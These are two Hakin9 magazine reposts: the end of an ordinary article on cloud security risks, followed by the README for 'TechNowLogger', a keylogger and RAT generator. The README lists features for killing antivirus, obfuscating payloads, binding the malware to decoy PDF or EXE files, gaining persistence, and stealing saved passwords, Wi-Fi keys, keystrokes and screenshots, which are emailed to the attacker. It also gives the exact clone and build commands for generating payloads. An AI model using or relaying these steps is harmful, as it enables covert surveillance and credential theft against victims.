7. Disaster recovery

Disasters like power outages or natural disasters can prevent access to infrastructure. Outages can take a minute, an hour, several hours or even days. During that time you have no control over your most critical data. As a result, employees will not have access to systems and tools. In addition, there will be no data transmission until access is restored.

8. Data loss

Many companies do not have enough visibility into what happens to their data in the cloud. Companies can easily lose data when multiple users work in the cloud at the same time. This is when the benefits of data sharing and collaboration become a security vulnerability. Risks such as password sharing, personal devices without any passwords, accidental file deletion are the main reason for data loss in the cloud.

Organizations need to invest in a cloud data loss prevention solution to prevent hackers from stealing sensitive information. You can use data loss prevention and disaster recovery tools, as well as dedicated systems to prevent malicious attacks. 

You should plan dedicated disaster recovery and business continuity strategies for cloud workloads. You also need to review your cloud provider data security options and request ongoing audit reports.

Conclusion

Robust cloud security is essential for companies that move their devices, data centers, and business processes to the cloud. Ensuring data security in the cloud is achieved through comprehensive security policies, backup and disaster recovery plans, and cloud security solutions. You should create your own security strategies and policies, and introduce only the practices and solutions that serve your network best.

About the Author: 

Gilad David Maayan is a technology writer who has worked with over 150 technology companies including SAP, Samsung NEXT, NetApp and Imperva, producing technical and thought leadership content that elucidates technical solutions for developers and IT leadership.

LinkedIn: https://www.linkedin.com/in/giladdavidmaayan/

The post Top 7 Cloud Security Issues and How to Overcome Them by Gilad David Maayan appeared first on Hakin9 - IT Security Magazine.

TechNowLogger is Keylogger Generator for Windows/Linux, which sends key-logs & screenshot via email with other juicy target info written in Python 3.

Disclaimer

This project was created only for good purposes and personal use.

THIS SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. YOU MAY USE THIS SOFTWARE AT YOUR OWN RISK. THE USE IS COMPLETE RESPONSIBILITY OF THE END-USER. THE DEVELOPERS ASSUME NO LIABILITY AND ARE NOT RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY THIS PROGRAM.

Features

• Works on Windows/Linux
• Notify New Victim Via Email
• Undetectable
• Persistence
• Sends Screenshot of Victim PC's Screen via email
• Creates Executable Binary With Zero Dependencies
• Create less size ~ 5mb payload with advance functionality
• Obfusticate the Payload before Generating it, hence Bypassing few more antivirus
• Generated Payload is Encryted with base64, hence makes extremely difficult to reverse engineer the payload
• Function to Kill Antivirus on Victim PC and tries to disable the security
• Awesome Colourful Interface to generate payload
• On Attacker Side: While Creating Payload, Script Automatically Detects Missing Dependencies & Installs Them
• Distinguish Log Data on the Basics of Active Window Name (Check v1.3 Image for Better Understanding)
• Able to add custom Icon to evil file (New Argument is Added in v1.3 & onward version)
• Built-in Binder which can bind Keylogger to Any File [.pdf, .txt, .exe etc], Running legitimate file on front end & evil codes in back-end as a service. (New Argument is Added in v1.4 & onward version)
• Checks for Already Running Instance on System, If running instance found, then only legitimate file is executed [Multiple Instance Prohibiter to avoid Same Muliple Logs Email].
• Attacker can Create/Compile for Both Windows/Linux OS Using Linux System, But Can only Create/Compile WindowsExecutable using Windows Machine
• Retrieves Saved Passwords from victim System and sends it to Attacker.

Note: Custom Stealer is Coded, does not relies on LaZagne

Tested On

Kali Linux - ROLLING EDITION

Windows 8.1 - Pro

Windows 7 - Ultimate

Prerequisite

• Python 3.X
• Few External Modules

How To Use in Linux

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git

# Navigate to technowlogger folder
$ cd technowlogger

# Installing dependencies
$ bash installer_linux.sh

*** Note When The Python Installer DialogBox Appear while executing installer_linux.sh ***
    * Click on custom install 
    * Select Path to : C:/Python37-32
    ### So that the python is installed in this path (Inside Wine) : ~/.wine/drive_c/Python37-32

$ chmod +x technowgen.py
$ python3 technowgen.py --help

# Making Payload/RAT
$ python3 technowgen.py -e youremail@gmail.com -p YourEmailPass -l -o output_file_name --icon icon_path

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

How To Use in Windows

# Install dependencies 
$ Install latest python 3.x

# Clone this repository
$ git clone https://github.com/Technowlogy-Pushpender/technowlogger.git

# Go into the repository
$ cd technowlogger

# Installing dependencies
$ python -m pip install -r requirements.txt

# Open technowgen.py in Text editor and Configure Line 12 WINDOWS_PYTHON_PYINSTALLER_PATH = "C:/Python37-32/Scripts/pyinstaller.exe" 

# Getting Help Menu
$ python technowgen.py --help

# Making Payload/RAT
$ python technowgen.py -e youremail@gmail.com -p YourEmailPass -w -o output_file_name --icon icon_path

How to Update

• Run updater.py to Update Automatically or Download the latest Zip from this GitHub repo
• Note: Git Must be Installed in order to use updater.py

Note:- Evil File will be saved inside dist/ folder, inside technowlogger/ folder

Available Arguments

• Optional Arguments

Note: Either -w/--windows or -l/--linux must be specified

• Required Arguments

New Screenshots:

Generating payload

Getting report

Retrieves & Sends Saved WIFI Password

• Note: In order to use this feature, specify -s or --steal-password while creating keylogger

Debug Issues

Try to Run Offline Keylogger in order to test Offline Key logs capturing & Debug keylogger issues by running these commands:

Run test_key.py In both the modes [Compiled & Raw] and figure out whats the error

Run it like this : python test_key.py

Also Compile it like this: pyinstaller --onefile test_key.py --hidden-import=win32event --hidden-import=winerror --hidden-import=win32api --hidden-import=pynput.keyboard

After running it, Start typing something, Result will be displayed on the Command prompt after every 10 seconds

Offline keylogger's files are present in TestKeylogger Folder

Removing TechNowLogger in Windows:

Method 1:

• Go to start, type regedit and run the first program, this will open the registry editor.
• Navigate to the following path Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run There should be an entry called svchost, right click this entry and select Delete.
• Go to your user path > AppData > Roaming, you’ll see a file named “svchost.exe”, this is the RAT, right click > Delete.
• Restart the System.

Method 2:

• Run "RemoveTechnowLogger.bat" in Infected System and then restart the PC to stop the current Running Evil File.

Removing TechNowLogger in Linux:

• Open Autostart file with any text editor, Autostart File Path: ~/.config/autostart/xinput.desktop
• Remove these 5 lines:

     [Desktop Entry]
     Type=Application
     X-GNOME-Autostart-enabled=true
     Name=Xinput
     Exec="destination_file_name"
  

• Note: destination_file_name is that name of evil_file which you gave to your Keylogger using -o parameter
• Reboot your system and then delete the evil file stored this this below path
• Destination Path, where Keylogger is stored : ~/.config/xnput

Video Tutorial

Contribute

• All Contributors are welcome, this repo needs contributors who will improve this tool to make it best.

TODO

• Add New features
• Contribute GUI Version

Contact

singhpushpender250@gmail.com

Support author: https://github.com/Technowlogy-Pushpender/technowlogger

The post TechNowLogger - Windows/Linux Keylogger Generator which sends key-logs via email with other juicy target info appeared first on Hakin9 - IT Security Magazine.